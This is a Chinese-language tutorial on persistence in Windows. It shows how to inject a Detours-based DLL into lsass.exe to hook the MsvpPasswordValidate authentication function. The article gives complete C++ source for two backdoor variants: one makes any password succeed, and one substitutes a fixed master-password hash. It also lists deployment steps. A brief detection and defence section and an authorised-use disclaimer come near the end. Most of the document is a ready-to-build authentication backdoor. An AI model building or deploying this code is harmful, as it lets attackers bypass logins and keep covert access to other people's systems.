Windows MsvpPasswordValidate实现权限维持
字数 890 2025-08-06 08:35:32
Windows权限维持技术:利用MsvpPasswordValidate实现后门
概述
本文详细讲解如何通过Hook Windows系统中的MsvpPasswordValidate函数实现权限维持的技术。该技术允许攻击者在系统上建立持久性后门,绕过正常认证机制或设置特定密码进行登录。
技术原理
MsvpPasswordValidate是Windows系统中位于NtlmShared.dll中的一个关键API,负责验证用户密码。通过Hook此函数,我们可以:
- 完全绕过密码验证(直接返回TRUE)
- 设置特定密码hash作为万能密码
- 记录用户登录凭证
准备工作
所需工具
-
Detours库:Microsoft提供的二进制代码注入和修改库
- 下载地址:Microsoft Research官网
- 编译方法:使用nmake编译后获取lib和头文件
-
进程注入工具:如Process Explorer等,用于将DLL注入lsass.exe进程
实现步骤
1. 定义函数类型
typedef BOOLEAN(WINAPI* pMsvpPasswordValidate)(
BOOLEAN,
NETLOGON_LOGON_INFO_CLASS,
PVOID,
void*,
PULONG,
PUSER_SESSION_KEY,
PVOID);
2. DLL主函数
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
return InstallHook();
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
return UninstallHook();
}
return TRUE;
}
3. 安装Hook
bool InstallHook() {
std::wofstream credentialFile;
credentialFile.open("D:\\111.txt", std::fstream::in | std::fstream::out | std::fstream::app);
// 加载NtlmShared.dll
HMODULE ntmlModule = LoadLibrary(L"NtlmShared.dll");
if (ntmlModule == nullptr) {
credentialFile << L"Domain: " << L"load error" << std::endl;
return false;
}
// 获取MsvpPasswordValidate函数地址
MsvpPasswordValidate = (pMsvpPasswordValidate)GetProcAddress(ntmlModule, "MsvpPasswordValidate");
credentialFile << L"Domain: " << L"MsvpPasswordValidate address: " << MsvpPasswordValidate << std::endl;
if (MsvpPasswordValidate == nullptr) {
credentialFile << L"Domain: " << L"GetProcAddress error" << std::endl;
return false;
}
// 开始Detour事务
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
// 附加Hook
LONG detourAttachResult = DetourAttach(&(PVOID&)MsvpPasswordValidate, HookMSVPPValidate);
if (detourAttachResult != NO_ERROR) {
credentialFile << L"Domain: " << L"DetourAttach error - " << detourAttachResult << std::endl;
DetourTransactionAbort();
return false;
}
// 提交事务
LONG code = DetourTransactionCommit();
if (code != NOERROR) {
credentialFile << L"Domain: " << L"Error" << std::endl;
}
else {
credentialFile << L"Domain: " << L"true" << std::endl;
}
credentialFile.close();
return true;
}
4. Hook函数实现
方案1:完全绕过密码验证
BOOLEAN HookMSVPPValidate(BOOLEAN UasCompatibilityRequired,
NETLOGON_LOGON_INFO_CLASS LogonLevel,
PVOID LogonInformation,
void* Passwords,
PULONG UserFlags,
PUSER_SESSION_KEY UserSessionKey,
PVOID LmSessionKey) {
return TRUE;
}
方案2:设置特定密码hash
BOOLEAN HookMSVPPValidate(BOOLEAN UasCompatibilityRequired,
NETLOGON_LOGON_INFO_CLASS LogonLevel,
PVOID LogonInformation,
void* Passwords,
PULONG UserFlags,
PUSER_SESSION_KEY UserSessionKey,
PVOID LmSessionKey) {
NETLOGON_LOGON_IDENTITY_INFO* logonIdentity = (NETLOGON_LOGON_IDENTITY_INFO*)LogonInformation;
// 先尝试正常验证
if (MsvpPasswordValidate(UasCompatibilityRequired, LogonLevel, LogonInformation, Passwords, UserFlags, UserSessionKey, LmSessionKey)) {
return TRUE;
}
else {
// 设置万能密码hash
const unsigned char pass[] = { /* 你的hash */ };
for (int i = 0; i < 16; i++) {
((unsigned char*)Passwords)[i] = pass[i];
}
return MsvpPasswordValidate(UasCompatibilityRequired, LogonLevel, LogonInformation, Passwords, UserFlags, UserSessionKey, LmSessionKey);
}
}
5. 卸载Hook
bool UninstallHook() {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)MsvpPasswordValidate, HookMSVPPValidate);
DetourTransactionCommit();
return TRUE;
}
部署方法
- 编译上述代码为DLL文件
- 使用进程注入工具将DLL注入到lsass.exe进程
- 注入成功后,系统认证机制即被修改
检测与防御
检测方法
- 进程分析:使用Process Explorer等工具检查lsass.exe加载的可疑DLL
- API监控:监控对
MsvpPasswordValidate的Hook行为 - 日志分析:检查异常登录事件
防御措施
- 限制对lsass.exe的进程注入
- 启用Windows Defender攻击面减少规则
- 定期检查系统关键DLL的完整性
- 监控和限制对NtlmShared.dll的修改
完整代码
#pragma once
#define SECURITY_WIN32
#define WIN32_LEAN_AND_MEAN
#define DEBUG_BUILD
#include <windows.h>
#include <SubAuth.h>
#include <iostream>
#include <fstream>
#include <string>
#include "detours.h"
#pragma comment (lib,"detours.lib")
typedef BOOLEAN(WINAPI* pMsvpPasswordValidate)(BOOLEAN, NETLOGON_LOGON_INFO_CLASS, PVOID, void*, PULONG, PUSER_SESSION_KEY, PVOID);
pMsvpPasswordValidate MsvpPasswordValidate = nullptr;
BOOLEAN HookMSVPPValidate(BOOLEAN UasCompatibilityRequired,
NETLOGON_LOGON_INFO_CLASS LogonLevel,
PVOID LogonInformation,
void* Passwords,
PULONG UserFlags,
PUSER_SESSION_KEY UserSessionKey,
PVOID LmSessionKey) {
return TRUE;
}
bool InstallHook() {
std::wofstream credentialFile;
credentialFile.open("D:\\111.txt", std::fstream::in | std::fstream::out | std::fstream::app);
HMODULE ntmlModule = LoadLibrary(L"NtlmShared.dll");
if (ntmlModule == nullptr) {
credentialFile << L"Domain: " << L"load error" << std::endl;
return false;
}
MsvpPasswordValidate = (pMsvpPasswordValidate)GetProcAddress(ntmlModule, "MsvpPasswordValidate");
credentialFile << L"Domain: " << L"MsvpPasswordValidate address: " << MsvpPasswordValidate << std::endl;
if (MsvpPasswordValidate == nullptr) {
credentialFile << L"Domain: " << L"GetProcAddress error" << std::endl;
return false;
}
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
LONG detourAttachResult = DetourAttach(&(PVOID&)MsvpPasswordValidate, HookMSVPPValidate);
if (detourAttachResult != NO_ERROR) {
credentialFile << L"Domain: " << L"DetourAttach error - " << detourAttachResult << std::endl;
DetourTransactionAbort();
return false;
}
LONG code = DetourTransactionCommit();
if (code != NOERROR) {
credentialFile << L"Domain: " << L"Error" << std::endl;
}
else {
credentialFile << L"Domain: " << L"true" << std::endl;
}
credentialFile.close();
return true;
}
bool UninstallHook() {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)MsvpPasswordValidate, HookMSVPPValidate);
DetourTransactionCommit();
return TRUE;
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
return InstallHook();
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
return UninstallHook();
}
return TRUE;
}
总结
通过Hook MsvpPasswordValidate实现权限维持是一种隐蔽且有效的后门技术。安全人员应了解此类技术原理,以便更好地防御相关攻击。在实际应用中,此类技术仅限用于合法授权测试,未经授权使用可能违反法律。